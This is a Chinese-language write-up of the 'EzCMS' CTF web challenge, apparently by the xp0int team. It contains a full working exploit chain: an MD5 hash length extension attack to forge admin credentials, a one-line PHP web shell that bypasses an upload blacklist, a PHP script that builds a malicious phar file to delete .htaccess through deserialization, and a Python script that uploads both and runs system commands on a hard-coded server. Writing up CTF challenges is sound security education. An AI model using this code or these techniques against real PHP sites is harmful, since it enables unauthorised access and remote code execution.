[Web] EzCMS - LanceaKing

xp0int Posted on Sep 11 2019

/www.zip有源码。

## 哈希长度扩展攻击
检查admin密码：
/config.php
![title](https://leanote.com/api/file/getImage?fileId=5d751653ab644162bb0074c4)
给出`md5($secret.'adminadmin')==='52107b08c0f3342d2153ae1d68e6262c'`
很明显要哈希长度扩展攻击，在密码后扩展

## 上传shell
尽管.htaccess限制着，shell还是可以上传的。
`<?php @$_REQUEST[f]($_REQUEST[x]);`就能绕过$black_list。

## 反序列化漏洞删除.htaccess
这里出现了反序列化漏洞：
![title](https://leanote.com/api/file/getImage?fileId=5d7519b8ab644162bb007581)
`mime_content_type()`如果路径是phar协议的话会对phar文件里的metadata反序列化。反序列化魔术方法只有`File::__destruct`：
![title](https://leanote.com/api/file/getImage?fileId=5d751aa0ab644160a90074ce)
看起来`File::checker = Admin`，但是还有另一处可疑的地方：
`Profile::__call`
![title](https://leanote.com/api/file/getImage?fileId=5d751bd6ab644162bb0075f2)
`ZipArchive::open`恰好有两个参数，并且可以用来删除文件：
![title](https://leanote.com/api/file/getImage?fileId=5d751e59ab644162bb00768b)
所以正确的是`Profile::admin = ZipArchive; File::checker = Profile`

phar协议绕过正则只需在前面加php协议：`php://filter/convert.base64-encode/resource=phar://...`

## phar.php
```php
<?php

class File {

public $filename;
    public $filepath;
    public $checker;

function __construct() {
        $this->checker = new Profile();
    }

// function __destruct() {
    //     if (isset($this->checker)) {
    //         $this->checker->upload_file();
    //     }
    // }

}

class Profile {

public $username;
    public $password;
    public $admin;

public function __construct() {
        // delete .htaccess
        $this->admin = new ZipArchive;
        $this->username = '/var/www/html/sandbox/03bc7306053517499b851326b9bcdeeb/.htaccess';
        $this->password = ZipArchive::OVERWRITE;
    }

// function __call($name, $arguments)
    // {
    //     $this->admin->open($this->username, $this->password);
    // }
}

$phar = new Phar('phar.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub("<?php var_dump('HaHa!'); __HALT_COMPILER(); ?>");
$o = new File();
$phar->setMetadata($o);
$phar->stopBuffering();
```
删除文件的路径一定是绝对路径，不然删不了。

## exp.py
```python
from hashlib import md5
from urllib import quote

from requests import Session

from hashpumpy import hashpump

BASE = 'http://112.126.102.158:9999'

# crack password
username = password = 'admin'
h1 = '52107b08c0f3342d2153ae1d68e6262c'
d1 = username + password
sn = 8
h2, d2 = hashpump(h1, d1, 'a', sn)
password = d2[len(username):]
print 'username: ' + username
print 'password: ' + quote(password)
print 'cookie: user=' + h2

sess = Session()

# login
sess.cookies.set('user', h2)
data = {'username': username, 'password': password}
sess.post(BASE + '/index.php', data=data)

# upload shell
shell = 'shell.php'
files = {'file': (shell, '<?php @$_REQUEST[f]($_REQUEST[x]);')}
sess.post(BASE + '/upload.php', files=files)
shellpath = md5(shell).hexdigest() + '.php'

# delete .htaccess
phar = 'phar.phar'
files = {'file': open(phar, 'rb')}
sess.post(BASE + '/upload.php', files=files)
filename = md5(phar).hexdigest() + '.phar'
filepath = (
    'php://filter/convert.base64-encode/resource='
    'phar://./sandbox/03bc7306053517499b851326b9bcdeeb/%s/test.txt' % filename)
params = {'filename': filename, 'filepath': filepath}
sess.get(BASE + '/view.php', params=params)

params = {'f': 'system', 'x': 'cat /flag'}
r = sess.get(
    BASE + '/sandbox/03bc7306053517499b851326b9bcdeeb/' + shellpath,
    params=params)
print r.text
```

打赏还是打残，这是个问题